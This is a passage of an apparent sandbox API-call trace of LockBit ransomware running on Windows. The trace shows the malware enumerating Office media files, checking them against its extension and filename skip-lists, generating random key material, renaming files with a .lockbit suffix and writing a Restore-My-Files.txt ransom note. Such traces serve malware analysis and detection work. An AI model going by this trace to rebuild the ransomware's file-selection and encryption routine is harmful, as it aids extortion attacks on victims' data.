dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0210.094] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0210.094] malloc (_Size=0x40068) returned 0x3df0008 [0210.094] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=350) returned 1 [0210.094] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.095] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.095] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0210.095] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.096] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.096] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0210.096] ReadFile (in: hFile=0xec, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0210.097] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21390_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21390_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0210.097] malloc (_Size=0xae) returned 0x1fa2ed8 [0210.097] NtSetInformationFile (FileHandle=0xec, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xae, FileInformationClass=0xa) returned 0x0 [0210.099] free (_Block=0x1fa2ed8) [0210.099] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21390_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES") returned 1 [0210.099] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt") returned 76 [0210.099] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0210.099] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7546300, ftCreationTime.dwHighDateTime=0x1bd8f92, ftLastAccessTime.dwLowDateTime=0xbce87320, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xb7546300, ftLastWriteTime.dwHighDateTime=0x1bd8f92, nFileSizeHigh=0x0, nFileSizeLow=0x3de, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21413_.GIF", cAlternateFileName="")) returned 1 [0210.099] lstrcmpiW (lpString1=".", lpString2="BD21413_.GIF") returned -1 [0210.099] lstrcmpiW (lpString1="..", lpString2="BD21413_.GIF") returned -1 [0210.099] PathFindExtensionW (pszPath="BD21413_.GIF") returned=".GIF" [0210.099] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0210.099] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0210.099] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0210.099] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0210.099] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0210.100] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0210.100] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0210.100] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0210.100] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0210.100] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0210.100] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0210.100] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0210.100] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0210.100] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0210.100] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0210.100] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0210.100] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0210.100] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0210.100] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0210.100] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0210.100] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0210.100] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0210.100] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0210.100] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0210.100] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0210.101] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0210.101] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0210.101] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0210.101] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0210.101] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0210.101] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0210.101] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0210.101] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0210.101] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0210.101] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0210.101] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0210.101] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0210.101] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0210.101] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0210.101] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0210.101] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0210.101] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0210.101] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0210.101] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0210.101] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0210.102] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0210.102] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0210.102] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21413_.GIF") returned 1 [0210.102] lstrcmpiW (lpString1="ntldr", lpString2="BD21413_.GIF") returned 1 [0210.102] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21413_.GIF") returned 1 [0210.102] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21413_.GIF") returned 1 [0210.102] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21413_.GIF") returned -1 [0210.102] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21413_.GIF") returned 1 [0210.102] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21413_.GIF") returned 1 [0210.102] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\") returned="" [0210.102] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21413_.GIF") returned=".GIF" [0210.102] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0210.102] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0210.102] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0210.102] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0210.102] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0210.102] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0210.102] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0210.102] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0210.102] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0210.103] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0210.103] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0210.103] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0210.103] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0210.103] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0210.103] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0210.103] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0210.103] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0210.103] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0210.103] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0210.103] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0210.103] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0210.103] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0210.103] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0210.103] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0210.103] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0210.103] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0210.103] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0210.103] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0210.103] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21413_.GIF.lockbit") returned 76 [0210.103] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21413_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd21413_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x238 [0210.105] CreateIoCompletionPort (FileHandle=0x238, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0210.105] malloc (_Size=0x40068) returned 0x1ff1e60 [0210.105] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=990) returned 1 [0210.105] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.106] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.106] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0210.106] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.106] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.106] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0210.107] ReadFile (in: hFile=0x238, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0210.120] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21413_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21413_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0210.120] malloc (_Size=0xae) returned 0x1fa2ed8 [0210.120] NtSetInformationFile (FileHandle=0x238, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xae, FileInformationClass=0xa) returned 0x0 [0210.122] free (_Block=0x1fa2ed8) [0210.122] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21413_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES") returned 1 [0210.122] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt") returned 76 [0210.122] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0210.122] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd290b00, ftCreationTime.dwHighDateTime=0x1bd8f93, ftLastAccessTime.dwLowDateTime=0xbce87320, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xd290b00, ftLastWriteTime.dwHighDateTime=0x1bd8f93, nFileSizeHigh=0x0, nFileSizeLow=0x770, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21427_.GIF", cAlternateFileName="")) returned 1 [0210.122] lstrcmpiW (lpString1=".", lpString2="BD21427_.GIF") returned -1 [0210.123] lstrcmpiW (lpString1="..", lpString2="BD21427_.GIF") returned -1 [0210.123] PathFindExtensionW (pszPath="BD21427_.GIF") returned=".GIF" [0210.123] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0210.123] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0210.123] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0210.123] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0210.123] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0210.123] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0210.123] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0210.123] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0210.123] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0210.123] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0210.123] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0210.123] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0210.123] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0210.123] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0210.123] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0210.123] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0210.123] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0210.123] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0210.123] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0210.123] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0210.123] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0210.123] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0210.123] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0210.123] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0210.123] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0210.124] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0210.124] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0210.124] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0210.124] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0210.124] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0210.124] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0210.124] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0210.124] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0210.124] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0210.124] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0210.124] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0210.124] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0210.124] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0210.124] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0210.124] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0210.124] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0210.124] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0210.124] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0210.124] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0210.124] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0210.124] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0210.124] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0210.124] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21427_.GIF") returned 1 [0210.124] lstrcmpiW (lpString1="ntldr", lpString2="BD21427_.GIF") returned 1 [0210.124] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21427_.GIF") returned 1 [0210.124] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21427_.GIF") returned 1 [0210.125] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21427_.GIF") returned -1 [0210.125] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21427_.GIF") returned 1 [0210.125] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21427_.GIF") returned 1 [0210.125] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\") returned="" [0210.125] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21427_.GIF") returned=".GIF" [0210.125] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0210.125] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0210.125] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0210.125] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0210.125] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0210.125] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0210.125] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0210.125] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0210.125] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0210.125] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0210.125] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0210.125] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0210.125] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0210.125] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0210.125] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0210.125] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0210.125] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0210.125] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0210.125] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0210.125] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0210.125] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0210.126] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0210.126] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0210.126] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0210.126] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0210.126] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0210.126] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0210.126] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0210.126] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21427_.GIF.lockbit") returned 76 [0210.126] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21427_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd21427_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0210.127] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0210.127] malloc (_Size=0x40068) returned 0x3df0008 [0210.128] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=1904) returned 1 [0210.128] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.128] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.128] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0210.128] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.129] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.129] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0210.129] ReadFile (in: hFile=0xec, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0210.133] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21427_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21427_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0210.133] malloc (_Size=0xae) returned 0x1fa2ed8 [0210.133] NtSetInformationFile (FileHandle=0xec, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xae, FileInformationClass=0xa) returned 0x0 [0210.135] free (_Block=0x1fa2ed8) [0210.135] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21427_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES") returned 1 [0210.135] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt") returned 76 [0210.135] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0210.135] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97bc3b00, ftCreationTime.dwHighDateTime=0x1bd8f90, ftLastAccessTime.dwLowDateTime=0xbcead480, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x97bc3b00, ftLastWriteTime.dwHighDateTime=0x1bd8f90, nFileSizeHigh=0x0, nFileSizeLow=0x11c, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21448_.GIF", cAlternateFileName="")) returned 1 [0210.135] lstrcmpiW (lpString1=".", lpString2="BD21448_.GIF") returned -1 [0210.135] lstrcmpiW (lpString1="..", lpString2="BD21448_.GIF") returned -1 [0210.135] PathFindExtensionW (pszPath="BD21448_.GIF") returned=".GIF" [0210.135] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0210.135] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0210.135] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0210.135] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0210.135] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0210.135] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0210.135] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0210.135] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0210.135] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0210.136] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0210.136] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0210.136] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0210.136] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0210.136] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0210.136] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0210.136] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0210.136] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0210.136] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0210.136] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0210.136] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0210.136] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0210.136] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0210.136] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0210.136] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0210.136] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0210.136] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0210.136] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0210.136] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0210.136] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0210.136] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0210.136] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0210.136] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0210.137] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0210.137] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0210.137] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0210.137] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 